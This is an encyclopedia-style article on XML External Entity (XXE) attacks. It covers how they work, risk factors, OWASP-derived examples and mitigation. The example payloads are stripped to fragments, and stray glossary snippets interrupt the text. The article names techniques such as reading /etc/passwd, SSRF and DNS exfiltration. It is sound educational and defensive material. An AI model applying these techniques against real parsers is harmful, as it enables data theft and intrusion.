XML External Entity attack, or simply XXE attack, is a type of attack against an application that parses
XML
Extensible Markup Language (XML) is a markup language and file format for storing, transmitting, and reconstructing arbitrary data. It defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. ...
input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data,
DoS attack
In computing, a denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host conne ...
s,
server-side request forgery,
port scanning
A port scanner is an application designed to probe a server or host for open ports. Such an application may be used by administrators to verify security policies of their networks and by attackers to identify network services running on a host a ...
from the perspective of the machine where the parser is located, and other system impacts.
Description
The XML 1.0 standard defines the structure of an XML document. The standard defines a concept called an
entity
An entity is something that exists as itself, as a subject or as an object, actually or potentially, concretely or abstractly, physically or not. It need not be of material existence. In particular, abstractions and legal fictions are usually r ...
, which is a term that refers to multiple types of data unit. One of those types of entities is an external general/parameter parsed entity, often shortened to external entity, that can access local or remote content via a declared
system identifier. The system identifier is assumed to be a
URI Uri may refer to:
Places
* Canton of Uri, a canton in Switzerland
* Úri, a village and commune in Hungary
* Uri, Iran, a village in East Azerbaijan Province
* Uri, Jammu and Kashmir, a town in India
* Uri (island), an island off Malakula Isla ...
that can be accessed by the XML processor when processing the entity. The XML processor then replaces occurrences of the named external entity with the contents that is referenced by the system identifier. If the system identifier contains tainted data and the XML processor dereferences this tainted data, the XML processor may disclose confidential information normally not accessible by the application. Similar attack vectors apply the usage of external
DTDs, external
style sheets, external
schemas, etc. which, when included, allow similar external resource inclusion style attacks.
Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using
file://
schemes or relative paths in the system identifier. Since the attack occurs relative to the application processing the XML document, an attacker may use this trusted application to pivot to other internal systems, possibly disclosing other internal content via
HTTP
The Hypertext Transfer Protocol (HTTP) is an application layer protocol in the Internet protocol suite model for distributed, collaborative, hypermedia information systems. HTTP is the foundation of data communication for the World Wide Web, ...
requests or launching a
CSRF attack to any unprotected internal services. In some situations, an XML processor library that is vulnerable to client-side
memory corruption issues may be exploited by dereferencing a malicious
URI Uri may refer to:
Places
* Canton of Uri, a canton in Switzerland
* Úri, a village and commune in Hungary
* Uri, Iran, a village in East Azerbaijan Province
* Uri, Jammu and Kashmir, a town in India
* Uri (island), an island off Malakula Isla ...
, possibly allowing arbitrary code execution under the
application account. Other attacks can access local resources that may not stop returning data, possibly impacting application availability if too many threads or processes are not released.
The application does not need to explicitly return the response to the attacker for it to be vulnerable to information disclosures. An attacker can leverage
DNS
The Domain Name System (DNS) is a hierarchical and distributed naming system for computers, services, and other resources in the Internet or other Internet Protocol (IP) networks. It associates various information with domain names assigned to ...
information to exfiltrate data through subdomain names to a DNS server under their control.
Risk factors
* The application parses XML documents.
* Tainted data is allowed within the system identifier portion of the entity, within the document type definition (DTD).
* The XML processor is configured to validate and process the DTD.
* The XML processor is configured to resolve external entities within the DTD.
Examples
The examples below are from
OWASP's ''Testing for XML Injection (WSTG-INPV-07)''.
Accessing a local resource that may not return
">
&xxe;
Remote code execution
When the
PHP
PHP is a General-purpose programming language, general-purpose scripting language geared toward web development. It was originally created by Danish-Canadian programmer Rasmus Lerdorf in 1993 and released in 1995. The PHP reference implementati ...
"expect" module is loaded,
remote code execution
In computer security, arbitrary code execution (ACE) is an attacker's ability to run any commands or code of the attacker's choice on a target machine or in a target process. An arbitrary code execution vulnerability is a security flaw in softwar ...
may be possible with a modified payload.
">
&xxe;
mypass
Disclosing /etc/passwd or other targeted files
">
&xxe;
">
&xxe;
">
&xxe;
">
&xxe;
Mitigation
Since the entire XML document is communicated from an untrusted client, it is not usually possible to selectively
validate or escape tainted data within the system identifier in the DTD. The XML processor could be configured to use a local static DTD and disallow any declared DTD included in the XML document.
See also
*
SQL injection
In computing, SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL inj ...
*
Blind SQL injection
In computing, SQL injection is a code injection technique used to Attack (computing), attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the ...
References
External links
OWASP XML External Entity (XXE) Prevention Cheat SheetTimothy Morgan's 2014 Paper: XML Schema, DTD, and Entity Attacks - A Compendium of Known TechniquesPrecursor presentation of above paper - at OWASP AppSec USA 2013*
ttp://cwe.mitre.org/data/definitions/827.html CWE-827: Improper Control of Document Type DefinitionSascha Herzog's Presentation on XML External Entity Attacks - at OWASP AppSec Germany 2010PostgreSQL XXE vulnerabilityXML Denial of Service Attacks and Defenses (in .NET)Early (2002) BugTraq Article on XXE{{Webarchive, url=https://web.archive.org/web/20190902095546/https://www.securityfocus.com/archive/1/297714/2002-10-27/2002-11-02/0, date=2019-09-02
XML 1.0 Extensible Markup Language (XML) 1.0 (Fifth Edition)
Web security exploits